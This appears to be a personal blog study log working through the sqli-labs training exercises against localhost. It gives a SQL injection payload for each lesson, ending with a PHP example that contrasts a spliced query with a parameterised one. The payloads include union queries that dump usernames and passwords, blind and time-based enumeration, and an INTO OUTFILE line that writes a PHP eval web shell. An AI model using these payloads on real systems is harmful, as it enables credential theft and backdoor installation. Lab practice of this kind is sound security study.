SQLI-Lab Exercises

I recently spent some time in onboarding training and felt that my security fundamentals still aren't solid enough, so I'm starting over from the basics: rereading 《白帽子学Web安全》 a few more times, and setting myself a goal of studying the source of at least one vulnerability every week and writing up a report.

This week I'm working through all of the sqli-labs exercises and writing out a payload for each one.

Page-1

Less-1:http://localhost/sqli-labs-php7/Less-1/?id=-1' union select 1,group_concat(id,'-',username,'-',password, '---'),3 from  users  -- %20

Less-2:http://localhost/sqli-labs-php7/Less-2/?id=-1 union select 1,group_concat(id,'-',username,'-',password, '---'),3 from  users  -- %20

Less-3:
http://localhost/sqli-labs-php7/Less-3/?id=-1') union select 1,group_concat(id,"-",username,"-",password, "---"),3 from  users  -- %20

Less-4:http://localhost/sqli-labs-php7/Less-4/?id=-1") union select 1,group_concat(id,"-",username,"-",password, "---"),3 from  users  -- %20

Less-5: blind injection
// enumerate databases
?id=1' and  ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
// enumerate tables
?id=1' and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+
// enumerate columns
?id=1' and left((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 2,1),8)='password' --+
// dump data
?id=1' and left((select username from users order by id limit 0,1),4)='Dumb' --+

Less-6: blind injection
// enumerate databases
?id=1" and  ascii(substr((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+
// enumerate tables
?id=1" and left((select table_name from information_schema.tables where information_schema.tables.table_schema=database() limit 0,1),1)='e' --+
// enumerate columns
?id=1" and left((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 2,1),8)='password' --+
// dump data
?id=1" and left((select username from users order by id limit 0,1),4)='Dumb' --+

less-7: file-write injection (into outfile)
?id=1'))  union select 1,"<?php @eval($_POST['chopper']);?>",3 into outfile "/Applications/XAMPP/xamppfiles/1.php" --+

less-8: boolean-based blind injection
?id=1' and left((select username from users order by id limit 0,1),4)='dumb'  --+

less-9: time-based blind injection (single quote)
?id=1'  and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+

less-10: time-based blind injection (double quote)
?id=1" and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1) --+


less-11
// enumerate tables
' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database() -- 
// enumerate columns
' union select 1,group_concat(column_name) from information_schema.columns where table_name = 'users' and table_schema = database() -- 
// dump data
' union select 1, group_concat(username,":",password," ") from users -- 
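Since the plan is to study each vulnerability's source, here is an added example of the two ways the lookup behind Less-1 can be written. It is not sqli-labs' own code: the vulnerable function only mirrors the Less-1 pattern of splicing `id` into the query text, and the host, credentials, database name and users table layout are assumed.

```php
<?php
// Added example, not the sqli-labs source. Connection details and the
// users(id, username, password) table layout are assumed.
$conn = new mysqli('localhost', 'root', 'root', 'security');
$conn->set_charset('utf8mb4');

// Less-1 style: the raw query parameter is spliced into the SQL text, so a
// value like  -1' union select 1,group_concat(...),3 from users --   closes
// the quoted literal and appends the attacker's own SELECT to the statement.
function vulnerable_lookup(mysqli $conn, string $id): ?array
{
    $sql = "SELECT id, username FROM users WHERE id='$id' LIMIT 0,1";
    $result = $conn->query($sql);
    return $result ? ($result->fetch_assoc() ?: null) : null;
}

// Hardened version: validate the type first, then bind the value as a
// parameter. The SQL text reaches the server before the value does, so quotes,
// parentheses, comment markers, sleep() or INTO OUTFILE inside the value are
// plain data; every payload on this page simply matches no row.
function safe_lookup(mysqli $conn, string $id): ?array
{
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false || $n < 1) {
        return null;                          // not a positive integer: reject
    }
    $stmt = $conn->prepare('SELECT id, username FROM users WHERE id = ? LIMIT 0,1');
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('i', $n);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();  // get_result() needs mysqlnd
    $stmt->close();
    return $row ?: null;
}

$row = safe_lookup($conn, $_GET['id'] ?? '');
if ($row === null) {
    http_response_code(400);
    echo 'invalid or unknown id';
} else {
    echo 'Your Login name: ' . htmlspecialchars($row['username']);
}
```

Feeding the Less-1 payload to `safe_lookup` fails at `FILTER_VALIDATE_INT` before any SQL is run, and even a bare `?id=1'` no longer produces the MySQL syntax error that the error-based lessons rely on.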
posted @ 2020-06-24 01:15  kimjun